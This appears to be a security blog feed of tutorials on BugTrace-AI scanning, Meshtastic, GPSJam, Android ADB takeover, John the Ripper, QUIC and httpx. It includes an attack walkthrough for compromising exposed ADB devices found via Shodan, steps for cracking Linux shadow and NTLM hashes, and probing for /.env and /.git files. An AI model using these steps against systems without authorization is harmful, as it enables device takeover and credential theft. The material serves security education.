At this point, you may encounter an issue with the script, as it is currently incompatible with Docker Compose version 2 at the time of writing. To fix the script, you can manually change it or use the following:

#!/bin/bash
set -e

COMPOSE_FILE="docker-compose.yml"

echo "--- Stopping any previous containers... ---"
docker compose -f "$COMPOSE_FILE" down -v || \
echo "Warning: 'docker compose down' failed. This might be the first run, which is okay."

echo "--- Building and starting the application... ---"
docker compose -f "$COMPOSE_FILE" up --build -d

echo "--- Application is now running! ---"
echo "Access it at: http://localhost:6869"
echo "To stop the application, run: docker compose -f $COMPOSE_FILE down"

# === Try to launch Firefox with checks ===
sleep 3 # Give the container a moment to start

if [ -z "$DISPLAY" ]; then
echo "⚠️ No GUI detected (DISPLAY is not set)."
echo "💡 Open http://localhost:6869 manually in your browser."
elif ! command -v firefox &> /dev/null; then
echo "⚠️ Firefox is not installed."
echo "💡 Install it with: sudo apt install firefox"
else
echo "🚀 Launching Firefox..."
firefox http://localhost:6869 &
fi

After updating the script, you should see the process of building the Docker image and starting the container in detached mode.

After finishing, you can now access BugTrace-AI at http://localhost:6869. You will see the disclaimer similar to the one below.

If you accept it, the app will load the main screen.

Step #2: Configuring API Access

BugTrace-AI requires an OpenRouter API key to function. OpenRouter provides unified access to multiple AI models through a single API, making it ideal for this application. Visit the OpenRouter website at https://openrouter.ai and create an account if you don’t already have one. Navigate to the API keys section and generate a new key.

In the BugTrace-AI interface, click the Settings icon in the header. This opens a modal where you can enter your API key.

Step #3: Understanding the Three Scan Modes

BugTrace-AI offers three URL analysis modes, each designed for different scenarios and authorization levels.

The Recon Scan focuses entirely on passive reconnaissance. It analyzes the URL structure looking for patterns that might indicate vulnerabilities, performs technology fingerprinting using public databases, searches CVE databases for vulnerabilities in identified technologies, and checks public exploit databases like Exploit-DB for available exploits. This mode never sends any traffic to the target beyond the initial page load.

The Active Scan analyzes URL patterns and parameters to hypothesize vulnerabilities. Despite its name, this mode remains “simulated active” because it doesn’t actually send attack payloads. Instead, it uses AI reasoning to identify URL patterns that commonly correlate with vulnerabilities. For example, URLs with parameters named “id” or “user” might be susceptible to SQL injection, while parameters that appear in the page output could be vulnerable to XSS. The AI generates hypotheses about potential vulnerabilities based on these patterns and guides how to test them manually.

The Grey Box Scan combines DAST with SAST by analyzing the page’s live JavaScript code. After loading the target URL, the tool extracts all JavaScript code from the page, including inline scripts and external files. The AI then performs static analysis on this JavaScript, looking for client-side vulnerabilities, hardcoded secrets or API keys, insecure data handling patterns, and client-side logic flaws.

For this exercise, we’ll analyze a web application with the third mode.

The tool generates a report summarizing its findings.

BugTrace-AI highlights possible vulnerabilities and suggests what to test manually based on what it finds. You can also review all results with the Agent, which remembers context so you can ask follow-up questions about earlier findings or how to verify them.

Step #4: Payload Generation Tools

Web Application Firewalls (WAFs) attempt to block malicious requests by detecting attack patterns. The Payload Forge helps bypass WAF protections by generating payload variations using obfuscation and encoding techniques.

The tool generates a few dozen payloads. Each of them includes an explanation of the obfuscation technique used and the specific WAF detection methods it’s designed to evade.

Besides that, BugTrace-AI suggests SSTI payloads and OOB Interaction Helper.

Summary

BugTrace-AI is a next-generation vulnerability scanning tool. Unlike traditional scanners that rely on rule-based detection, BugTrace-AI focuses on understanding the logic and context of its target.

In this article, we installed the tool and tested some of its features. But, this is not a comprehensive guide; BugTrace-AI offers many more capabilities designed to make cybersecurity work easier. We encourage you to install the tool and explore its full potential on your own. Keep in mind that it is not an all-in-one solution, and every finding should be manually verified.

If you want to dive deeper into using AI for hacking, consider checking out AI for Cybersecurity training. This 7-hour video course, led by a Master OTW, is designed to take your understanding and practical use of artificial intelligence to the next level.

The post Artificial Intelligence in Cybersecurity, Part 7: AI-Powered Vulnerability Scanning with BugTrace-AI first appeared on Hackers Arise.

Off-Grid Communications, Part 1: Introduction to Meshtastic Networks

19 December 2025 at 08:44

Welcome back, my aspiring cyberwarriors!

In our eventful time, the ability to communicate off-grid has become more valuable than ever. Whether you’re preparing for emergencies, exploring remote locations, or simply want a decentralized communication network that doesn’t rely on cellular towers or internet infrastructure, Meshtastic offers a powerful solution.

In this article, we will explore what Meshtastic is and what it has to offer.

What is Meshtastic?

Meshtastic is an open-source mesh networking platform that leverages LoRa (Long Range) radio technology to create decentralized communication networks. Unlike traditional communications that depend on cellular networks or WiFi, Meshtastic enables devices to communicate directly with each other over long distances, creating a self-healing network where messages hop from node to node until they reach their destination.

The platform is built around the concept of decentralization, meaning no central server or infrastructure is required. Each node operates independently while contributing to the network’s overall reach. With LoRa technology you can communicate over several kilometers. Some configurations have achieved ranges of 10-20km in open terrain.

The low power consumption design makes it excellent for battery-operated devices and for portable and remote deployments. Meshtastic works across various hardware platforms, including ESP32, Raspberry Pi, and dedicated LoRa boards, and the cost-effectiveness of the required hardware components means basic nodes can be built for under $50.

Key Purposes and Use Cases

The primary purposes and use cases of these communication systems include supporting outdoor activities like hiking, camping, backpacking, and off-roading, allowing groups to stay in touch over long distances without relying on cellular towers. They are also essential in emergency and disaster response situations, providing communication during natural disasters, power outages, or other scenarios where cellular networks fail. These systems play a crucial role in search and rescue operations as well.

Meshtastic Node Map

Additionally, they facilitate messaging in remote or restricted areas where connectivity is poor or internet access is limited. Community members and hobbyists use these systems to create local mesh networks for experimentation, conduct large-scale testing at events such as DEF CON, or establish backup communication systems for urban areas.

Ultimately, these universal communication systems enhance safety, build community connections, and ensure reliable communication in various challenging environments.

How Does Mashtastic Work?

Meshtastic operates on hardware such as ESP32-based boards (e.g., Heltec, LilyGO T-Beam) or pre-built nodes equipped with LoRa modules. These devices are programmed with Meshtastic firmware and function on unlicensed ISM radio bands, making them legal in most regions without the need for a ham radio license, although using higher power may require one in certain areas.

A LILYGO TTGO T-Beam running in client mode on battery power

Communication Process

Sending a Message: To send a message, connect a Meshtastic device (referred to as a “node”) to your phone via Bluetooth (or sometimes Wi-Fi/serial) using companion apps available for Android, iOS, web, or desktop. Type your message in the app, and it will be sent to your node.

Broadcasting: The node then broadcasts the encrypted message packet over the LoRa radio. It is important to note that LoRa is designed for low-bandwidth communication, making it suitable for short text messages but not for voice or video.

Meshing and Relaying: Nearby nodes that receive the packet check if it is new (nodes track received packets to avoid duplicates). If it is new, they will rebroadcast it after decrementing a “hop limit” (the default is around 3 hops to prevent infinite looping). This creates a flooding mesh that relays the message from node to node until it reaches the intended recipient(s) or the hop limit is exhausted.

Receiving: The destination node receives the packet, decrypts it using AES256 encryption with shared channel keys, and forwards it to the connected app or phone for display. Additionally, nodes can share location data to map group positions.

Differences Between LTE, 5G, and Meshtastic

Many of us depend on LTE and 5G networks daily, so it’s important to compare them with Meshtastic.

AspectMeshtastic (LoRa Mesh)LTE (4G)5G
TechnologyLoRa radio (915 MHz ISM band in US, license-free)Cellular (various bands, e.g., 700–2600 MHz)Cellular (sub-6 GHz + mmWave high bands)
InfrastructureDecentralized mesh: User-deployed nodes relay messagesCentralized: Carrier-owned cell towersCentralized: Dense cell towers + small cells
Coverage/Range5–20+ km per hop (line-of-sight, terrain-dependent); extends via meshNationwide/global where towers exist; indoor/outdoorSimilar to LTE but denser for high speeds; mmWave short-range
Data SpeedVery low: ~0.5–20 kbps (text-only, short messages)5–100 Mbps typical (up to 300 Mbps peak)100 Mbps–1+ Gbps typical (up to 10–20 Gbps theoretical)
LatencySeconds to minutes (mesh hopping)20–50 ms1–10 ms (ultra-low for real-time apps)
Data TypesText messages, GPS positions, basic telemetryVoice, video, high-speed internet, appsAll LTE + AR/VR, IoT, autonomous vehicles
Power ConsumptionVery low: Weeks/months on battery/solarModerate: Drains phone battery quicklyHigher (especially mmWave); improved efficiency in newer devices
CostLow one-time (devices + optional solar); no subscriptionsMonthly plan + deviceHigher plans; premium for full speeds
Reliability in OutagesExcellent: Works off-grid, no single point of failureFails without power/towers (e.g., disasters)Same as LTE; more vulnerable to congestion
LimitationsText-only, slow, needs multiple nodes for rangeRequires signal/subscriptionLimited high-speed coverage; higher battery drain

These technologies serve different purposes: Meshtastic for resilient, infrastructure-independent communication in remote or emergency scenarios, versus LTE/5G for high-speed, everyday mobile internet and voice.

Summary

Meshtastic is a free and user-friendly tool that enables you to send messages without relying on the internet or mobile networks. It connects small, specialized devices to form a network, allowing communication over long distances. This makes it ideal for outdoor adventures, emergencies, or communication in remote areas.

Stay tuned as we continue to explore off-grid communication and simulate the mesh network using minimal hardware equipment in future articles.

Open Source Intelligence (OSINT): Explore GPS/GNSS Jamming Around the World

16 December 2025 at 15:07

Welcome back, aspiring cyberwarriors!

In our previous article on anti-drone warfare, we discussed the topic of jamming. Based on observations from the Russian-Ukrainian war, jamming is not only a legitimate electronic warfare technique but also a highly effective one. One notable incident involved Ursula von der Leyen’s plane, which was reportedly affected by suspected Russian GPS jamming. Furthermore, there have been numerous instances where weapons made by either Russia or the U.S. missed their targets due to GPS jamming. To further explore this issue, I would like to introduce a tool that visualizes GPS/GNSS disruptions affecting aircraft worldwide – GPSJam.

What Is GPSJam?

GPSJam.org is a website that offers information about GPS interference experienced by aircraft around the world. It utilizes data from ADS-B Exchange, a crowd-sourced flight tracking platform, to create daily maps that show areas likely to experience GPS interference. These maps are based on aircraft reports regarding the accuracy of their navigation systems.

It’s worth mentioning that GPSJam focuses not solely on GPS but also on GNSS in general. GNSS, or Global Navigation Satellite System, is a broad term that refers to any satellite navigation system capable of providing global coverage. This category includes various satellite-based positioning systems. Examples of GNSS include GPS (Global Positioning System) from the United States, GLONASS from Russia, Galileo from the European Union, and BeiDou from China.

How Does It Work?

Most aircraft are typically equipped with a device known as ADS-B Out, which stands for “Automatic Dependent Surveillance-Broadcast.” This system allows a plane to share its location, speed, and altitude with air traffic control and other aircraft in the vicinity. Additionally, it serves as a vital navigation tool that assists planes in approaching for landing.

Flight professionals and enthusiasts use specialized equipment to receive this information and relay it to flight-tracking websites like ADS-B Exchange. These platforms then visualize the flight data on interactive maps.

When aircraft utilize ADS-B Out, they not only transmit their position but also indicate the accuracy of that position. According to the tool provider, “when there is interference with their GPS, the uncertainty goes up.” Therefore, greater interference leads to decreased accuracy. Conversely, when there is little or no interference, the accuracy improves. Essentially, ADS-B Exchange collects data on the accuracy of an aircraft’s position. The tool provider aggregates this information over a 24-hour period and organizes it into hexagon sections, assigning different colors to represent varying levels of accuracy.

Get Started with GPSJam

To begin investigating where Russians or others conduct jamming, we should simply open https://gpsjam.org/ in our browser.

One of the most valuable functions is filtering by a date. But keep in mind that historical data only goes back to 14 February 2022.

Additionally, there are further settings that enable filtering by location and traffic threshold.

GPSJam clearly demonstrates GPS/GNSS interference; however, it’s important to note that some output data on this website may not be solely due to jamming. GNSS interference could also result from hardware issues in aircraft, as well as from weather conditions.

Summary

Jamming represents the forefront of cyber warfare. Tools like GPSJam can help identify areas experiencing jamming without the need for additional hardware or security clearance.

If you are a dedicated OSINT investigator, consider exploring this tool, as it may enhance your work. Furthermore, if you’re new to the field of Open Source Intelligence, check out our OSINT training.

Android Hacking: How Hackers Use Android Debug Bridge (ADB) to Take Over Devices

15 December 2025 at 10:46

Welcome back, aspiring cyberwarriors!

According to StatCounter, in 2025 Android powers over 3.3 billion users worldwide, dominating the global mobile OS market with a 71.85% share. But beyond phones, Android also powers a wide range of devices, including tablets, TVs, automotive systems, XR devices, and more.

Today, I’d like to show you how all of these devices can be hacked in seconds due to the negligence of their owners.

Android Debug Bridge (ADB)

Android Debug Bridge (ADB) is a versatile command-line tool that allows you to communicate with an Android device or emulator. The ADB command enables various device actions, such as installing and debugging apps. It also provides access to a Unix shell, letting you run a wide range of commands directly on the device.

ADB is a client-server program composed of three main components:

  • Client: Runs on your development machine and sends commands. You invoke the client by issuing ADB commands from a terminal.
  • Server: Also runs on your development machine as a background process. It manages communication between the client and the device daemon, handling multiple device connections.
  • Daemon (adbd): Runs as a background process on each connected Android device or emulator. It executes commands sent from the server.

ADB can be accessed via both USB and Wi-Fi. When ADB is enabled over Wi-Fi (also known as ADB over TCP/IP), it listens on port 5555 and can accept connections from any device that can reach it — not just those on the same Wi-Fi network, but potentially from other networks via the internet if the device’s port is exposed, effectively opening a door for hackers.

Recon

To find systems with exposed ADB, we can use the well-known service Shodan — for example, by using the search query: “Android Debug Bridge port:5555”.

You can use nmap to check if there’s an ADB server on a target host like this:

kali> nmap <IP> -p 5555 -sV

If the service is running and allows unauthorized access, you might be able to see some valuable information, such as the system name, model, and available features.

Attack Via ADB Shell

First of all, we need to install the ADB shell, we can do so with the command:

kali> sudo apt install adb

You can check if the installation succeeded by viewing the help screen:

kali> adb –help

After that, we can try to connect:

kali> adb connect <ip>:<port>

We can check the connected devices, with command:
kali> adb devices

And move directly to the shell:

kali> adb shell

And we’re immediately granted root access to the system. We can do anything we want.

Post-Exploitation

Once ADB shell access is obtained, a single session can be useful but remains limited. Real offensive operations demand persistent access, remote control, and covert data channels. This is where Command and Control (C2) becomes essential. I won’t cover it here, as it’s a broad topic, but you can learn more in our Infrastructure Basics for Hackers course.

Conclusion

ADB is not inherently insecure, but when misconfigured, it becomes one of the fastest ways to compromise an Android-based system. The attacker does not need a CVE or an exploit chain. All they need is port 5555 and silence on the defender’s side.

Thousands of devices remain exposed today—mostly smart TVs, Android TV boxes, routers, IoT appliances, and older smartphones. These devices are often unpatched, unmanaged, and forgotten.

Find out if your phone has been hacked and how to investigate it by attending our Mobile Forensics class.

Password Cracking: Getting Started with John the Ripper

13 December 2025 at 09:56

Welcome back, aspiring cyberwarriors!

John the Ripper (often called “John”) is a tool that earned a reputation as one of the most powerful and versatile in the field. Originally developed by Openwall, John has become an essential tool for penetration testers, security auditors, and anyone else who needs to assess password strength.

In this tutorial, you’ll learn how to use John the Ripper from the ground up. We’ll start with installation and basic concepts, then move through the three main password cracking modes with hands-on exercises for each. Let’s get rolling!

What Makes John the Ripper Powerful?

John the Ripper works by comparing password hashes against potential passwords. It generates candidate passwords, hashes them using the same algorithm as the target, and checks for matches. This approach is effective against various hash types, including MD5, SHA-1, SHA-256, bcrypt, and more.

In addition, the tool supports multiple platforms, including Linux, Windows, and macOS. It features multiple cracking modes, including Single, Wordlist, and Incremental approaches. John supports extensive hash formats, allowing you to crack dozens of different hash types. Besides that, you can create customizable rules to generate password variations, and the Jumbo version even includes GPU acceleration for significantly faster cracking.

Installation

John the Ripper is pre-installed on Kali Linux. Verify the installation:

kali> john

For Ubuntu/Debian, you can install John from the apt repository:

kali> sudo apt install john

Once you have installed John, try the help command to make sure your installation is working.

kali> john -h

Understanding Password Cracking Modes

John the Ripper offers three primary cracking modes, each suited for different scenarios.

1. Single Crack Mode

Single Crack Mode uses information from the username to generate password variations. This mode is surprisingly effective because users often create passwords based on their usernames.

You should use Single Crack Mode as a quick first attempt, especially when you have username information available. The syntax is straightforward:

kali> john –single –format=FORMAT hashfile.txt

The mode works by taking patterns from the username and generating variations. If the username is “hacker”, John will try variations like Hacker2025, HACKER2025, hacker2025!, 2025hacker, and many more permutations based on capitalization changes, number additions, and common character substitutions.

The command for cracking will be the following:

kali> john –single –format=raw-sha256 hash.txt

And immediately, we got an output with the password.

2. Wordlist Mode (Dictionary Attack)

Wordlist Mode compares hashes against a list of potential passwords from a dictionary file. This is the most commonly used mode for password cracking because it balances speed with effectiveness.

You should use Wordlist Mode when you have a good wordlist, which covers most real-world scenarios. The syntax requires specifying both the wordlist file and the hash format:

kali> john –wordlist=WORDLIST_FILE –format=FORMAT hashfile.txt

The RockYou wordlist is the most famous collection, containing over 14 million passwords leaked from the RockYou.com breach. But your cracking process should not be focused on this list. Consider creating your own wordlist, specific to your target. We’ve covered previously how to do so with tools like crunch and cupp.

But for demonstration purposes, I created a hash file with the password from a RockYou list.
The command for cracking will be the following:

kali> john –wordlist=/usr/share/wordlists/rockyou.txt –format=raw-sha256 hash.txt

3. Incremental Mode (Brute Force)

Incremental Mode tries all possible character combinations. This is the most thorough but slowest method, making it suitable only for specific scenarios.

You should use Incremental Mode as a last resort, particularly for short passwords when other methods have failed. The basic syntax is:

kali> john –incremental –format=FORMAT hashfile.txt

This mode exhaustively tries every possible combination of characters, starting with single characters and working up to longer passwords. This process can take days, weeks, or even years for moderately long passwords.

The command for cracking will be the following:

kali> john –incremental –format=raw-sha256 hash.txt

Cracking Windows NTLM Hashes

In Windows, password hashes are stored in the SAM database. The SAM uses the LM/NTLM hash format for passwords, and we can use John the Ripper to crack one of these hashes. Retrieving passwords from the SAM database is beyond the scope of this article, but let’s assume you have obtained a password hash for a Windows user. Here is the command to crack it:

kali> john –format=NT ntlm_hash.txt

This command will use a Single mode for cracking by default.

Cracking a Linux Password

In Linux, two important files are stored in the /etc directory: passwd and shadow. The passwd file contains information such as the username, user ID, and login shell, while the shadow file holds the password hash, expiration details, and other related data.

Besides the main “john” command, John the Ripper includes several additional utilities, one of which is called unshadow. This tool merges the passwd and shadow files into a single combined file that John can process when cracking passwords.

Here is how you use the unshadow command:

kali> unshadow passwd shadow > hash.txt

This command will combine the files and create a hash.txt file. Now, we can crack the hash using John. But here is a thing: Kali Linux’s John the Ripper doesn’t readily detect the hash type of Linux (crypt). If you omit the — format flag below, John won’t crack anything at all. So the command will be as follows:

kali> john –format=crypt hash.txt

Summary

John the Ripper is a robust tool for cracking passwords. It compares password hashes against potential passwords using various algorithms and is compatible with many types of hashes.

This tool works on a bunch of different platforms and is made to use energy wisely, which is why it’s a favorite among security experts and aspiring hackers. With security needs on the rise, John the Ripper is still a strong and valuable tool in the world of cybersecurity.

Network Security: Get Started with QUIC and HTTP/3

5 December 2025 at 09:53

Welcome back, aspiring cyberwarriors!

For decades, traditional HTTP traffic over TCP, also known as HTTP/1 and HTTP/2, has been the backbone of the web, and we have tools to analyze, intercept, and exploit it. But nowadays, we have HTTP/3, which is steadily increasing adoption across the web. In 2022, around 22% of all websites used HTTP/3; in 2025, this number increased to ~40%. And as cyberwarriors, we need to stay ahead of these changes.

In the article, we briefly explore what’s under the hood of HTTP/3 and how we can get in touch with it. Let’s get rolling!

What is HTTP/3?

HTTP/3 is the newest evolution of the Hypertext Transfer Protocol—the system that lets browsers, applications, and APIs move data across the Internet. What sets it apart is its break from TCP, the long-standing transport protocol that has powered the web since its earliest days.

TCP (Transmission Control Protocol) is reliable but inflexible. It was built for accuracy, not speed, ensuring that all data arrives in perfect order, even if that slows the entire connection. Each session requires a multi-step handshake, and if one packet gets delayed, everything behind it must wait. That might have been acceptable for email, but it’s a poor fit for modern, high-speed web traffic.

To overcome these limitations, HTTP/3 uses QUIC (Quick UDP Internet Connections), a transport protocol built on UDP and engineered for a fast, mobile, and latency-sensitive Internet. QUIC minimizes handshake overhead, avoids head-of-line blocking, and encrypts nearly the entire connection by default—right from the start.

After years of development, the IETF officially standardized HTTP/3 in 2022. Today, it’s widely implemented across major browsers, cloud platforms, and an ever-growing number of web servers.

What Is QUIC?

Traditional web traffic follows a predictable pattern. A client initiates a TCP three-way handshake, then performs a TLS handshake on top of that connection, and finally begins sending HTTP requests. QUIC collapses this entire process into a single handshake that combines transport and cryptographic negotiation. The first time a client connects to a server, it can establish a secure connection in just one round trip. On subsequent connections, QUIC can achieve zero round-trip time resumption, meaning the client can send encrypted application data in the very first packet.

The protocol encrypts almost everything except a minimal connection identifier. Unlike TLS over TCP, where we can see TCP headers, sequence numbers, and acknowledgments in plaintext, QUIC encrypts packet numbers, acknowledgments, and even connection close frames. This encryption-by-default approach significantly reduces the metadata available for traffic analysis.

QUIC also implements connection migration, which allows a connection to survive network changes. If a user switches from WiFi to cellular, or their IP address changes due to DHCP renewal, the QUIC connection persists using connection IDs rather than the traditional four-tuple of source IP, source port, destination IP, and destination port.

QUIC Handshake

The process begins when the client sends its Initial packet. This first message contains the client’s supported QUIC versions, the available cipher suites, a freshly generated random number, and a Connection ID — a randomly chosen identifier that remains stable even if the client’s IP address changes. Inside this Initial packet, the client embeds the TLS 1.3 ClientHello message along with QUIC transport parameters and the initial cryptographic material required to start key negotiation. If the client has connected to the server before, it may even include early application data, such as an HTTP request, to save an extra round trip.

The server then responds with its own set of information. It chooses one of the client’s QUIC versions and cipher suites, provides its own random number, and supplies a server-side Connection ID along with its QUIC transport parameters. Embedded inside this response is the TLS 1.3 ServerHello, which contains the cryptographic material needed to derive shared keys. The server also sends its full certificate chain — the server certificate as well as the intermediate certificate authorities (CAs) that signed it — and may optionally include early HTTP response data.

Once the client receives the server’s response, it begins the certificate verification process. It extracts the certificate data and the accompanying signature, identifies the issuing CA, and uses the appropriate root certificate from its trust store to verify the intermediate certificates and, ultimately, the server’s certificate. To do this, it hashes the received certificate data using the algorithm specified in the certificate, then checks whether this computed hash matches the one that can be verified using the CA’s public key. If the values match and the certificate is valid for the current time period and the domain name in use, the client can trust that the server is genuine. At this point, using the TLS key schedule, the client derives the QUIC connection keys and sends its TLS Finished message inside another QUIC packet. With this exchange completed, the connection is fully ready for encrypted application data.

From this moment onward, all traffic between the client and server is encrypted using the established session keys. Unlike traditional TCP combined with TLS, QUIC doesn’t require a separate TLS handshake phase. Instead, TLS is tightly integrated into QUIC’s own handshake, allowing the protocol to eliminate extra round-trips. One of the major advantages of this design is that both the server and client can include actual application data — such as HTTP requests and responses — within the handshake itself. As a result, certificate validation and connection establishment occur in parallel with the initial exchange of real data, making QUIC both faster and more efficient than the older TCP+TLS model.

How Does QUIC Network Work?

The image below shows the basic structure of a QUIC-based network. As illustrated, HTTP/3 requests, responses, and other application data all travel through QUIC streams. These streams are encapsulated in several logical layers before being transmitted over the network.

Anatomy of a QUIC stream:

A UDP datagram serves as the outer transport container. It contains a header with the source and destination ports, along with length and checksum information, and carries one or more QUIC packets. This is the fundamental unit transmitted between the client and server across the network.

A QUIC packet is the unit contained within a UDP datagram, and each datagram may carry one or more of them. Every QUIC packet consists of a QUIC header along with one or more QUIC frames.

The QUIC header contains metadata about the packet and comes in two formats. The long header is used during connection setup, while the short header is used once the connection is established. The short header includes the connection ID, packet number, and key phase, which indicates the encryption keys in use and supports key rotation. Packet numbers increase continuously for each connection and key phase.

A frame is the smallest structured unit inside a QUIC packet. It contains the frame type, stream ID, offset, and a segment of the stream’s data. Although the data for a stream is spread across multiple frames, it can be reassembled in the correct order using the connection ID, stream ID, and offset.

A stream is a unidirectional or bidirectional channel of data within a QUIC connection. Each QUIC connection can support multiple independent streams, each identified by its own ID. If a QUIC packet is lost, only the streams carried in that packet are affected, while all other streams continue uninterrupted. This independence is what eliminates the head-of-line blocking seen in HTTP/2. Streams can be created by either endpoint and can operate in both directions.

HTTP/3 vs. HTTP/2 vs. HTTP/1: What Actually Changed?

To understand the significance of HTTP/3, it helps to first consider the limitations of its predecessors.

HTTP/1.1, the original protocol still used by millions of websites, handles only one request per TCP connection. This forces browsers to open and close multiple connections just to load a single page, resulting in inefficiency, slower performance, and high sensitivity to network issues.

HTTP/2 introduced major improvements, including multiplexing, which allows multiple requests to share a single TCP connection, as well as header compression and server push. These changes provided significant gains, but the protocol still relies on TCP, which has a fundamental limitation: if one packet is delayed, the entire connection pipeline stalls. This phenomenon, known as head-of-line blocking, cannot be avoided in HTTP/2.

HTTP/3 addresses this limitation by replacing TCP with a more advanced transport layer. Built on QUIC, HTTP/3 establishes encrypted sessions faster, typically requiring only one round-trip instead of three or more. It eliminates head-of-line blocking by giving each stream independent flow control, allowing other streams to continue even if one packet is lost. It can maintain sessions through IP or network changes, recover more gracefully from packet loss, and even support custom congestion control tailored to different workloads.

In short, HTTP/3 is not merely a refined version of HTTP/2. It is a fundamentally redesigned protocol, created to overcome the limitations of previous generations, particularly for mobile users, latency-sensitive applications, and globally distributed traffic.

Get Started with HTTP/3

Modern versions of curl (7.66.0 and later with HTTP/3 support compiled in) can test whether a target supports QUIC and HTTP/3. Here’s how to probe a server:

kali> curl –http3 -I https://www.example.com

This command attempts to connect using HTTP/3 over QUIC, but will fall back to HTTP/2 or HTTP/1.1 if QUIC isn’t supported.

Besides that, it’s also useful to see how QUIC traffic looks “in the wild.” One of the easiest ways to do this is by using Wireshark, a popular tool for analyzing network packets. Even though QUIC encrypts most of its payload, Wireshark can still identify QUIC packet types, versions, and some metadata, which helps us understand how a QUIC connection is established.

To start, open Wireshark and visit a website that supports QUIC. Cloudflare is a good example because it widely deploys HTTP/3 and the QUIC protocol. QUIC typically runs over UDP port 443, so the simplest filter to confirm that you are seeing QUIC traffic is:

udp.port == 443

This filter shows all UDP traffic on port 443, which almost always corresponds to QUIC when dealing with modern websites.

QUIC uses different packet types during different stages of the connection. Even though the content is encrypted, Wireshark can still distinguish these packet types.

To show only Initial packets, which are the very first packets exchanged when a client starts a QUIC connection, use:

quic.long.packet_type == 0

Initial packets are part of QUIC’s handshake phase. They are somewhat similar to the “ClientHello” and “ServerHello” messages in TLS, except QUIC embeds the handshake inside the protocol itself.

If you want to view Handshake packets, which continue the cryptographic handshake after the Initial packets, use:

quic.long.packet_type == 2

These packets help complete the secure connection setup before QUIC switches to encrypted “short header” packets for normal data (like HTTP/3 requests and responses).
Also, QUIC has multiple versions, and servers often support more than one. To see packets that use a specific version, try:

quic.version == 0x00000001

This corresponds to QUIC version 1, which is standardized in RFC 9000. By checking which QUIC version appears in the traffic, you can understand what the server supports and whether it is using the standardized version or an older draft version.

Summary

QUIC isn’t just an incremental upgrade — it’s a complete reimagining of how modern internet communication should work. While the traditional stack of TCP + TLS + HTTP/2 served us well for many years, it was never designed for the realities of today’s internet: global-scale latency, constantly changing mobile connections, and the growing demand for both high performance and strong security. QUIC was built from the ground up to address these challenges, making it faster, more resilient, and more secure for the modern web.

Keep coming back, aspiring cyberwarriors, as we continue to explore how fundamental protocols of the internet are being rewritten.

Bug Bounty: Get Started with httpx

4 December 2025 at 10:05

Welcome back, aspiring cyberwarriors!

Before we can exploit a target, we need to understand its attack surface completely. This means identifying web servers, discovering hidden endpoints, analyzing response headers, and mapping out the entire web infrastructure. Traditional tools like curl and wget are useful, but they’re slow and cumbersome when you’re dealing with hundreds or thousands of targets. You need something faster and more flexible.

Httpx is a fast and multi-purpose HTTP toolkit developed by ProjectDiscovery that allows running multiple probes using a simple command-line interface. It supports HTTP/1.1, HTTP/2, and can probe for various web technologies, response codes, title extraction, and much more.

In this article, we will explore how to install httpx, how to use it, and how to extract detailed information about a target. We will also cover advanced filtering techniques and discuss how to use this tool effectively. Let’s get rolling!

Step #1 Install Go Programming Language

Httpx is written in Go, so we need to have the Go programming language installed on our system.

To install Go on Kali Linux, use the following command:

kali > sudo apt install golang-go

Once the installation completes, verify it worked by checking the version:

kali > go version

Step #2 Install httpx Using Go

To install httpx, enter the following command:

kali > go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest

The “-v” flag enables verbose output so you can see what’s happening during the installation. The “@latest” tag ensures you’re getting the most recent stable version of httpx. This command will download the source code, compile it, and install the binary in your Go bin directory.

To make sure httpx is accessible from anywhere in your terminal, you need to add the Go bin directory to your PATH if it’s not already there. Check if it’s in your PATH by typing:

kali > echo $PATH

If you don’t see something like “/home/kali/go/bin” in the output, you’ll need to add it. Open your .bashrc or .zshrc file (depending on which shell you use) and add this line:

export PATH=$PATH:~/go/bin

Then reload your shell configuration:

kali > source ~/.bashrc

Now verify that httpx is installed correctly by checking its version:

kali > httpx -version

Step #3 Basic httpx Usage and Probing

Let’s start with some basic httpx usage to understand how the tool works. Httpx is designed to take a list of hosts and probe them to determine if they’re running web servers and extract information about them.

The simplest way to use httpx is to provide a single target directly on the command line. Let’s probe a single domain:

kali> httpx -u “example.com” -probe

This command initiates an HTTP probe on the website. This is useful for quickly checking the availability of the web page.

Now let’s try probing multiple targets at once. Create a file with several domains you want to probe.

Now run httpx against this file:

kali > httpx -l hosts.txt -probe

Step #4 Extracting Detailed Information

One of httpx’s most powerful features is its ability to extract detailed information about web servers in a single pass.

Let’s quickly identify what web server is hosting each target:

kali > httpx -l hosts.txt -server

Now let’s extract even more information using multiple flags:

kali> httpx -l hosts.txt -title -tech-detect -status-code -content-length -response-time

This command will extract the page title, detect web technologies, show the HTTP status code, display the content length, and measure the response time.

The “-tech-detect” flag is particularly valuable because it uses Wappalyzer fingerprints to identify the technologies running on each web server. This can reveal content management systems, web frameworks, and other technologies that might have known vulnerabilities.

Step #5 Advanced Filtering and Matchers

Filters in httpx allow you to exclude unwanted responses based on specific criteria, such as HTTP status codes or text content.

Let’s say you don’t want to see targets that return a 301 status code. For this purpose, the -filter-code or -fc flag exists. To see the results clearly, I’ve added the -status-code or -sc flag as well:

kali > httpx -l hosts.txt -sc -fc 301

Httpx outputs filtered results without status code 301. Besides that, you can filter “dead” or default/error responses with -filter-error-page or -fep flag.

kali> httpx -l hosts.txt -sc -fep

This flag enables “filter response with ML-based error page detection”. In other words, when you use -fep, httpx tries to detect and filter out responses that look like generic or error pages.

In addition to filters, httpx has matchers. While filters exclude unwanted responses, matchers include only the responses that meet specific criteria. Think of filters as removing noise, and matchers as focusing on exactly what you’re looking for.

For example, let’s output only responses with 200 status code using the -match-code or -mc flag:

kali> httpx -l hosts.txt -status-code -match-code 200

For more advanced filtering, you can use regex patterns to match specific content in the response (-match-regex or -mr flag):

kali> httpx -l hosts.txt -match-regex “admin|login|dashboard”

This will only show targets whose response body contains the words “admin,” “login,” or “dashboard,” helping you quickly identify administrative interfaces or login pages.

Step #6 Probing for Specific Vulnerabilities and Misconfigurations

Httpx can be used to quickly identify common vulnerabilities and misconfigurations across large numbers of targets. While it’s not a full vulnerability scanner, it can detect certain issues that indicate potential security problems.

For example, let’s probe for specific paths that might indicate vulnerabilities or interesting endpoints:

kali > httpx -l targets.txt -path “/admin,/login,/.git,/backup,/.env”

The -path flag, as the name suggests, tells httpx to probe specific paths on each target.

Another useful technique is probing for different HTTP methods:

kali > httpx -l targets.txt -sc -method -x all

In the command above, the -method flag is used to display HTTP request method, and -x all to probe all of these methods.

Summary

